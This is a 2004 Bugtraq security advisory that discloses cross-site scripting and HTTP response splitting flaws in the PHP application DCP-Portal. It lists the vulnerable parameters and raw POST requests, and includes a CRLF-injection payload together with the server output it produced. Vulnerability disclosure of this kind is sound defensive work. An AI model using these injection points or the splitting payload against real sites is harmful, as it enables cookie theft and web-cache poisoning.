[Maxpatrol Security Advisory] Multiple vulnerabilities in DCP-Portal

To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: [Maxpatrol Security Advisory] Multiple vulnerabilities in DCP-Portal
From: "Alexander Antipov" <antipov@xxxxxxxxxxxxxx>
Date: Wed, 6 Oct 2004 18:14:17 +0400
Cc: <full-disclosure@xxxxxxxxxxxxxxxx>
Importance: Normal
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Title: [Maxpatrol Security Advisory] Multiple vulnerabilities in
DCP-Portal 

Date: 28.09.2004
Severity: Low

Application: DCP-Portal, dcp-portal

Platform: PHP

I. DESCRIPTION
--------------
Multiple vulnerabilities were found in DCP-Portal. A remote user can
conduct cross-site scripting attacks and HTTP response splitting
attacks. 
<p>
1. XSS in GET
/calendar.php?year=[XSS code here]&month=09&day=01
/calendar.php?year=2004&month=[XSS code here]&day=01
/calendar.php?year=2004&month=09&day=[XSS code here]
/index.php?page=annoucements&cid=[XSS code here]
/annoucement.php?aid=8&cid=[XSS code here] 
/news.php?nid=34&cid=[XSS code here] 
/contents.php?cid=[XSS code here] 
/index.php?cid=[XSS code here]

2. XSS in post

POST /index.php?page=send_write HTTP/1.1 
Host: dcp-portal 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 91 

PHPSESSID=1&yname=1&yadd=1&fname=1&fadd=1&url=[XSS code here]


POST /search.php HTTP/1.1 
Host: dcp-portal 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 59 

PHPSESSID=1&q=XSS code here]&fields=1 


POST /register.php HTTP/1.1 
Host: dcp-portal 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 137 

PHPSESSID=1&sex=1&sex=1&name=1&surname=1&email=scanner@xxxxxxxxxxxxxx&ad
dres
s=1&zip=1&city=1&country=[XSS code here]


3. HTTP response splitting


POST /calendar.php?show=full_month HTTP/1.1 
Host: dcp-portal 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 200 

PHPSESSID=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0a
Cont
ent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a%3chtml%3eSca
nned
%20by%20PTsecurity%3c/html%3e%0d%0a&s=1&submit=1 


Result

<...>
(Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4
PHP/4.3.8 FrontPage/5.0.2.2634a mod_ssl/2.8.19 OpenSSL/0.9.7a 
X-Powered-By: PHP/4.3.8 
Set-Cookie: PHPSESSID= 
Content-Length: 0 

HTTP/1.0 200 OK 
Content-Type: text/html 
Content-Length: 34 

<html>Scanned by PTsecurity</html> 
; path=/ 
Expires: Thu, 19 Nov 1981 08:52:00 GMT 
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0 
Pragma: no-cache 
Transfer-Encoding: chunked 
Content-Type: text/html 
<...> 



II. IMPACT
----------

A remote user can access the target user's cookies (including
authentication cookies).  A remote user may be able to poison any
intermediate web caches with arbitrary content.

III. SOLUTION
-------------

Not available currently.


IV. VENDOR FIX/RESPONSE
-----------------------

n/a


V. CREDIT
-------------

This vulnerability was discovered by Positive Technologies using
MaxPatrol (www.maxpatrol.com) - intellectual professional security
scanner. It is able to detect a substantial amount of vulnerabilities
not published yet. MaxPatrol's intelligent algorithms are also capable
to detect a lot of vulnerabilities in custom web-scripts (XSS, SQL and
code injections, HTTP Response splitting).

Prev by Date: Directory traversal in Tridcomm 1.3
Next by Date: Latest Apple Sec update
Previous by thread: Directory traversal in Tridcomm 1.3
Next by thread: [GoSecure Advisory] Neoteris IVE Vulnerability
Index(es):
- Date
- Thread